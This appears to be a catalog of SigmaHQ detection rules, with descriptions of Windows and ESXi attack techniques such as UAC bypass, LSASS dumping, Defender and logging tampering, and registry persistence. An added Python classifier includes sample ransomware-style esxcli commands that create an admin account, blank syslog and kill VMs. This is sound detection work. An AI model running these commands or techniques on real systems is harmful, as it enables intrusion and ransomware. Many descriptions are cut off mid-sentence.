Detects the setting of the environment variable "windir" to a non-default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup t

backdoor, evasion
SigmaHQ source
T1087
imProcessCreate

Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.

SigmaHQ source
T1087
imNetworkSession

Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.

SigmaHQ source
T1070.004
imFileEvent

Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1496
imNetworkSession

Detects initiated network connections to crypto mining pools

SigmaHQ source
T1036
imProcessCreate

Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC

evasion
SigmaHQ source
T1490
imProcessCreate

Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)

SigmaHQ source
imProcessCreate

Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)

exploit
SigmaHQ source
imProcessCreate

Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)

exploit
SigmaHQ source
T1685
imProcessCreate

Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed techniq

ransomware
SigmaHQ source
T1588.002, T1003
imProcessCreate

Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed

SigmaHQ source
imRegistry

Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for

persistence
SigmaHQ source
T1036
imProcessCreate

Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.

SigmaHQ source
T1113
imProcessCreate

Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.

apt
SigmaHQ source
imProcessCreate

Adversaries may

powershell
SigmaHQ source
T1685
imProcessCreate

Detects requests to disable Microsoft Defender features using PowerShell commands

powershell
SigmaHQ source
T1059
imProcessCreate

Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes

SigmaHQ source
T1546.011
imRegistry

Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.

persistence
SigmaHQ source
T1048
imProcessCreate

Detects a suspicious output redirection to the local admins share; this technique is often found in malicious scripts or hacktool stagers.

SigmaHQ source
T1112
imProcessCreate

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of you

SigmaHQ source
T1102, T1090, T1572
imProcessCreate

Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to clean up tunnel connections.

SigmaHQ source
T1090.001
imProcessCreate

Detects the execution of the "cloudflared" binary from a non-standard location.

SigmaHQ source
T1090.001
imProcessCreate

Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain o

backdoor, ransomware
SigmaHQ source
T1102, T1090, T1572
imProcessCreate

Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.

persistence
SigmaHQ source
T1090.001
imProcessCreate

Detects the execution of a renamed "cloudflared" binary.

SigmaHQ source
T1528
imProcessCreate

Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive infor

SigmaHQ source
T1685
imProcessCreate

Detects commands that temporarily turn off Volume Snapshots

SigmaHQ source
T1112
imRegistry

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of you

SigmaHQ source
imNetworkSession

The hypothesis detects potential

cobalt-strike
SigmaHQ source
imRegistry

Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution

evasion, powershell
SigmaHQ source
T1587.001
imFileEvent

Detects the creation of a file with an uncommon extension in an Office application startup folder

SigmaHQ source
T1547.001
imRegistry

Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder

persistence
SigmaHQ source
T1564
imFileEvent

Detects the creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.

SigmaHQ source
imFileEvent

Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware

SigmaHQ source
imProcessCreate

Detects process execution from a fake recycle bin folder, often used to evade security solutions.

SigmaHQ source
T1048
imProcessCreate

Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques

backdoor
SigmaHQ source
T1547.009
imFileEvent

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework

SigmaHQ source
T1546.011
imRegistry

Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.

persistence
SigmaHQ source
T1059
imProcessCreate

Detects suspicious parent process for cmd.exe

SigmaHQ source
T1046, T1082, T1106, T1518, T1548.002, T1552.001, T1555, T1555.003
imProcessCreate

Detects commandline keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.

exploit
SigmaHQ source
T1055.009
imProcessCreate

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

SigmaHQ source
imProcessCreate

Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.

SigmaHQ source
T1176.001
imProcessCreate

Detects a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension.

SigmaHQ source
T1486, T1562.001
DeviceImageLoadEvents

Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them

SigmaHQ source
T1546.007
imRegistry

Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious N

persistence
SigmaHQ source
T1176.001
imProcessCreate

Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension

SigmaHQ source
T1574.012
imRegistry

Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.

SigmaHQ source
imProcessCreate

Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox method

SigmaHQ source
T1685
imRegistry

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing th

SigmaHQ source
T1685
imRegistry

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing th

SigmaHQ source
T1567.001, T1572
imNetworkSession

Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

persistence
SigmaHQ source
T1567, T1572
imNetworkSession

Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

persistence
SigmaHQ source
T1037.001
imProcessCreate

Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.

persistence
SigmaHQ source
T1562.001
imRegistry

Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to b

SigmaHQ source
T1047, T1204.002, T1218.010
imProcessCreate

Detects suspicious and uncommon child processes of WmiPrvSE

wmi
SigmaHQ source
T1218
imProcessCreate

Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

SigmaHQ source
T1059.001, T1216
imProcessCreate

Detects code execution via Pester.bat (Pester - PowerShell module for testing).

powershell
Msxsl.EXE Execution
sigma medium
SigmaHQ source
T1220
imProcessCreate

Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data withi

evasion
SigmaHQ source
T1105
imNetworkSession

Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.

SigmaHQ source
T1218
imProcessCreate

Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE. The downloaded files are temporarily stored in ":\Users\%username%\

SigmaHQ source
T1220
imProcessCreate

Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.

SigmaHQ source
T1036
imProcessCreate

Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.

evasion
SigmaHQ source
T1218
imProcessCreate

Detects uncommon child processes of Appvlp.EXE. Appvlp, or the Application Virtualization Utility, is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Norma

SigmaHQ source
T1505.003, T1018, T1033, T1087
imProcessCreate

Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system

backdoor, credential-theft, webshell
SigmaHQ source
T1505.003
imProcessCreate

Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help com

webshell
SigmaHQ source
T1190
imWebSession

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

SigmaHQ source
T1137.002
imRegistry

Detects the addition of the Office test registry key that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started.

persistence
SigmaHQ source
T1047, T1053, T1059.003, T1059.001
imProcessCreate

Detects various execution patterns of the CrackMapExec pentesting framework

SigmaHQ source
T1685
imRegistry

Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.

SigmaHQ source
T1218, T1202
imProcessCreate

Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

persistence
SigmaHQ source
imFileEvent

Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility by an "Image" or "Process" other than VsCode.

SigmaHQ source
imFileEvent

Detects the creation of a file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via the VsCode tunnel feature.

SigmaHQ source
T1071.001
imProcessCreate

Detects the installation of VsCode tunnel (code-tunnel) as a service.

SigmaHQ source
T1071.001
imProcessCreate

Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system

powershell
SigmaHQ source
T1546.013
imFileEvent

Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence.

SigmaHQ source
T1003.001
imFileEvent

Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

SigmaHQ source
T1001.003
imFileEvent

Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

SigmaHQ source
T1105
imProcessCreate

Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download a file.

SigmaHQ source
imRegistry

Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.

powershell
SigmaHQ source
T1036.007
imFileEvent

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

SigmaHQ source
T1505.003
imFileEvent

Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.

SigmaHQ source
T1059.003
imFileEvent

Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<usern

SigmaHQ source
T1564.004
imFileEvent

Detects the creation of a hidden file/folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powers

SigmaHQ source
T1564.004
imProcessCreate

Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell

powershell
SigmaHQ source
T1112
imRegistry

Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security

SigmaHQ source
T1546, T1548
imRegistry

Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'

SigmaHQ source
T1548.002
imProcessCreate

Adversaries may leverage suspicious child processes of eventvwr.exe to bypass UAC and execute privileged code, indicating potential elevation of privilege. SOC teams should proactively hunt for

evasion
SigmaHQ source
T1548.002
imRegistry

Detects UAC bypass method using Windows event viewer

evasion
SigmaHQ source
imFileEvent

Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments

SigmaHQ source
T1070
DeviceImageLoadEvents

Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"

SigmaHQ source
T1559.001, T1218.010
imNetworkSession

Detects a network connection initiated by "Regsvr32.exe"

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects a remote DLL load event via "rundll32.exe".

SigmaHQ source
T1048.003
imProcessCreate

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (host

backdoor, exploit
SigmaHQ source
T1218
imProcessCreate

Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store pay

SigmaHQ source
T1218
imProcessCreate

Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.

evasion
SigmaHQ source
T1105, T1564.003
imProcessCreate

Detects execution of a Chromium-based browser in headless mode

SigmaHQ source
T1560.001
imProcessCreate

Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

backdoor
SigmaHQ source
imProcessCreate

Detects the execution of a Chromium-based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).

backdoor
SigmaHQ source
imFileEvent

Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can someti

SigmaHQ source
imRegistry

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files fro

backdoor
SigmaHQ source
imProcessCreate

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files fro

backdoor
SigmaHQ source
imRegistry

Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.

SigmaHQ source
T1059.012T1098
imProcessCreate

Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and Loc

SigmaHQ source
T1562.001T1562.003T1059.012
imProcessCreate

Detects changes to the ESXi syslog configuration via "esxcli"

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc.

SigmaHQ source
T1059.012T1529
imProcessCreate

Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.

SigmaHQ source
T1033T1007T1059.012
imProcessCreate

Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
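
The esxcli entries above (account creation, permission assignment, syslog tampering, the system/network/storage/vm/vsan discovery commands and the VM kill) differ only in which esxcli namespace appears on the command line, so one classifier covers the whole family. The following Python is an added example, not the listing's or SigmaHQ's code: it tokenizes an ESXi process-creation command line, unwraps sh -c wrappers, drops option flags so a leading --formatter does not shift the namespace, and maps the remaining prefix to one rule family. The namespaces are real esxcli namespaces; the rule labels are names chosen for this example and the technique column repeats the listing's own references.

```python
import shlex

# Added example (not from the original listing): map an ESXi process-creation
# command line onto the esxcli rule families above. The namespaces are real
# esxcli namespaces; the rule labels are names chosen for this example and the
# technique column repeats the listing's own references.

# Ordered most-specific first so "system account add" wins over plain "system".
ESXCLI_RULES = [
    (("system", "account", "add"), "esxi_account_creation", "T1136"),
    (("system", "permission", "set"), "esxi_admin_permission_assigned", "T1098"),
    (("system", "syslog", "config"), "esxi_syslog_config_change", "T1562.003"),
    (("system",), "esxi_system_discovery", "T1007"),
    (("vm", "process", "kill"), "esxi_vm_kill", "T1529"),
    (("vm",), "esxi_vm_discovery", "T1007"),
    (("network",), "esxi_network_discovery", "T1007"),
    (("storage",), "esxi_storage_discovery", "T1007"),
    (("vsan",), "esxi_vsan_discovery", "T1007"),
]


def esxcli_args(cmdline):
    """Return the positional tokens after the esxcli image, or None if absent.

    Options (anything starting with '-') are dropped so that global flags such
    as --formatter do not shift the namespace, and 'sh -c "..."' wrappers are
    unwrapped by re-parsing the quoted inner command.
    """
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a hostile command line
        tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if tok.rsplit("/", 1)[-1] == "esxcli":
            return [t for t in tokens[i + 1:] if not t.startswith("-")]
        if tok == "-c" and i + 1 < len(tokens):
            inner = esxcli_args(tokens[i + 1])
            if inner is not None:
                return inner
    return None


def classify_esxcli(cmdline):
    """Return (rule_label, technique) for the first matching family, or None."""
    args = esxcli_args(cmdline)
    if args is None:
        return None
    for prefix, label, technique in ESXCLI_RULES:
        if tuple(args[: len(prefix)]) == prefix:
            return label, technique
    return "esxcli_other", "T1059.012"


# Constructed sample lines in the order a ransomware operator typically runs
# them: discovery, account/permission setup, logging tamper, then VM kills.
SAMPLE_LINES = [
    "esxcli vm process list",
    "esxcli storage filesystem list",
    "esxcli system account add -i backup -p Passw0rd -c Passw0rd",
    "esxcli system permission set -i backup -r Admin",
    "esxcli system syslog config set --loghost=",
    "/bin/sh -c 'esxcli vm process kill --type=force --world-id=2101234'",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(classify_esxcli(line), "<-", line)
```

The value of grouping these is sequencing: a host that emits discovery, then account creation, then a syslog change, then VM kills within minutes is the DarkSide/LockBit pattern the individual entries describe, and correlating the labels in order is far less noisy than alerting on each esxcli invocation.
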

SigmaHQ source
T1190
imWebSession

Detects potential SQL injection attempts via GET requests in access logs.

SigmaHQ source
T1202
imProcessCreate

Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity

cobalt-strike
SigmaHQ source
T1003.001
imProcessCreate

Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

credential-theft
SigmaHQ source
T1102
imProcessCreate

Detects suspicious child processes of the "ManageEngine ServiceDesk Plus" Java web service

SigmaHQ source
T1082
imProcessCreate

Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem

SigmaHQ source
T1082
imProcessCreate

Detects listing or file reading of ".dockerenv", which can be a sign of potential container discovery

SCR File Write Event
sigma medium
SigmaHQ source
T1218.011
imFileEvent

Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.

SigmaHQ source
imProcessCreate

Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.

SigmaHQ source
T1136T1059.012
imProcessCreate

Detects user account creation on ESXi system via esxcli

SigmaHQ source
T1685
imProcessCreate

Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious

SigmaHQ source
T1059.001T1204
imProcessCreate

Detects possible execution via LNK file accessed on a WebDAV server.

SigmaHQ source
T1112
imRegistry

Detects setting Notification_Suppress to 1 to disable Windows Security Center notifications

SigmaHQ source
imRegistry

Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes

persistence
SigmaHQ source
imRegistry

Detects adversaries modifying the "Hangs" registry key to inject a Debugger entry, enabling persistence by triggering malicious

persistence
SigmaHQ source
T1112
imRegistry

Detects setting DisallowRun to 1 to prevent users from running specific programs

SigmaHQ source
T1112
imRegistry

Detects enabling the RDP feature to allow a specific user to connect via RDP to the targeted machine

SigmaHQ source
T1216
imProcessCreate

Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass AppLocker controls.

evasion
SigmaHQ source
T1548.002
imRegistry

Bypasses User Account Control using a fileless method

evasion
SigmaHQ source
T1547.010
imRegistry

Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification

evasion
SigmaHQ source
T1112
imRegistry

Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.

SigmaHQ source
T1564T1112
imRegistry

Detects disabling the CrashDump via the registry (as used by HermeticWiper)

SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1202
imRegistry

Detects the abuse of custom file open handler, executing powershell

powershell
SigmaHQ source
T1574.001T1112
imRegistry

Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)

SigmaHQ source
T1685
imRegistry

Detects disabling Windows Defender Exploit Guard Network Protection

exploit
SigmaHQ source
imRegistry

Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros

SigmaHQ source
T1685
imRegistry

Detects registry modifications that disable Privacy Settings Experience

SigmaHQ source
T1685
imRegistry

Detects disabling Windows Defender PUA protection

SigmaHQ source
T1685
imRegistry

Detects disabling Windows Defender Tamper Protection

SigmaHQ source
T1686.003
imRegistry

Detects setting EnableFirewall to 0 to disable the Windows firewall

SigmaHQ source
T1112
imRegistry

Detects setting UseActionCenterExperience to 0 to disable Windows Security Center notifications

SigmaHQ source
T1685
imRegistry

Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections

SigmaHQ source
T1140T1112
imRegistry

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into dat

backdoor
SigmaHQ source
imRegistry

Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.

SigmaHQ source
T1559.002
imRegistry

Detects enabling the Dynamic Data Exchange (DDE) protocol in all supported editions of Microsoft Word or Excel.

SigmaHQ source
T1112T1685
imRegistry

Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll

SigmaHQ source
T1112T1685
imRegistry

Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)

SigmaHQ source
T1112T1685
imRegistry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

SigmaHQ source
T1218
imRegistry

Detects that the DLL path written to the registry differs from the default one. When launched, WAB.exe loads the DLL from the path stored in the registry.

SigmaHQ source
T1685
imRegistry

Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information ab

IE Change Domain Zone
sigma medium
SigmaHQ source
T1137
imRegistry

Hides the file extension through modification of the registry

SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1105
imRegistry

Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be i

SigmaHQ source
T1003.001
imRegistry

Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.

credential-theft
SigmaHQ source
T1112
imRegistry

Adversaries may leverage macro-enabled documents in suspicious registry paths to execute malicious code and establish persistence by manipulating Office trust records

SigmaHQ source
T1685
imRegistry

Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.

SigmaHQ source
T1112
imRegistry

Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring

backdoor
SigmaHQ source
T1204.002
imRegistry

A general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.

SigmaHQ source
T1574.001T1112
imRegistry

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

SigmaHQ source
imRegistry

Detects the abuse of the exefile handler in new file association. Used for bypass of security products.

evasion
SigmaHQ source
imRegistry

Detects the registration of a new ODBC driver.

backdoor
SigmaHQ source
T1490
imRegistry

Detects the addition of new root, CA or AuthRoot certificates to the Windows registry

SigmaHQ source
T1112
imRegistry

Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook to run applications or execute macros

SigmaHQ source
T1137T1008T1546
imRegistry

Detects the modification of Outlook security setting to allow unprompted execution of macros.

SigmaHQ source
imRegistry

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialo

backdoorpersistence
SigmaHQ source
imRegistry

Detects an adversary modifying the registry to redirect the "hhctrl" entry to a malicious binary, a persistence mechanism that loads a custom payload to maintain access. SOC teams should proactively hunt for this behavior in Azure Sentinel, as it is a stealthy persistence method often used by advanced threats that evade traditional detection.

persistence
SigmaHQ source
T1553.003
imRegistry

Detects when an attacker registers a new SIP provider for persistence and defense evasion

evasionpersistence
SigmaHQ source
T1685
imRegistry

Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionality. When AMSI attempts to start its COM component, it will query its registered CLSID and return a non

SigmaHQ source
imRegistry

Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)

SigmaHQ source
imRegistry

Detects tampering with attachment manager settings policies attachments (See reference for more information)

SigmaHQ source
T1003
imRegistry

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

credential-theft
SigmaHQ source
T1685.001
imRegistry

Detects tampering with the EventLog service "File" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting

SigmaHQ source
T1546.015
imRegistry

Detects potential persistence using Appx DebugPath

persistence
SigmaHQ source
T1546.012
imRegistry

Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under

persistence
SigmaHQ source
imRegistry

Detects changes to the "AutodialDLL" key, which could be used as a persistence method to load a custom DLL via the "ws2_32" library

persistence
SigmaHQ source
imRegistry

Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence

persistence
SigmaHQ source
imRegistry

Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process

persistence
SigmaHQ source
T1137.006
imRegistry

Detects potential persistence via the creation of an Excel add-in (XLL) file to make it run automatically when Excel is started.

persistence
SigmaHQ source
imRegistry

Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatic

credential-theftpersistence
SigmaHQ source
imRegistry

Detects when an attacker registers a new SIP provider for persistence and defense evasion

evasionpersistence
SigmaHQ source
T1137T1008T1546
imRegistry

Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module

persistence
SigmaHQ source
T1546.015
imRegistry

Detects use of scrobj.dll, as this DLL looks for the ScriptletURL key to get the location of the script to execute

persistence
SigmaHQ source
T1546.011
imRegistry

Detects the installation of a new shim database where the file is located in a non-default location

persistence
SigmaHQ source
imRegistry

Detects modifications or additions to the 'TypedPaths' key in the user or admin registry by a non-standard application, which might indicate a persistence attempt

persistence
SigmaHQ source
T1216
imProcessCreate

Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"

SigmaHQ source
T1218
imRegistry

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

SigmaHQ source
T1546.015
imRegistry

Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.

persistence
SigmaHQ source
T1491.001
imRegistry

Detects changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages

aptransomware
SigmaHQ source
T1574
imRegistry

Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence; the debugger will get invoked when an application crashes

persistence
SigmaHQ source
T1053.005
imRegistry

Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telem

persistence
SigmaHQ source
T1216
imProcessCreate

Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands

powershell
SigmaHQ source
imRegistry

Detects the enablement of developer features such as "Developer Mode" or "Application Sideloading", which allow the user to install untrusted packages.

evasion
SigmaHQ source
T1003
imRegistry

Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location

backdoor
SigmaHQ source
T1569.002
imRegistry

Detects PowerShell code written to the registry as a service.

powershell
SigmaHQ source
T1564.001T1112
imRegistry

Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging or transcription and script execution logging

powershell
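
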